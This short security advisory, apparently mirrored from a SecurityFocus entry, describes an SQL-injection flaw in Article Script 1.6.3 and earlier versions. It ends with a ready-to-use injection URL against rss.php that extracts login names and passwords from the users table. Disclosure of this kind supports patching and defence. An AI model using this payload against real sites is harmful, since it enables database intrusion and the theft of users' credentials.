9 lines
No EOL
574 B
Text
Executable file
9 lines
No EOL
574 B
Text
Executable file
source: http://www.securityfocus.com/bid/20929/info
|
|
|
|
Article Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
|
|
|
|
Article Script 1.6.3 and prior versions are vulnerable to this issue.
|
|
|
|
http://www.example.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/* |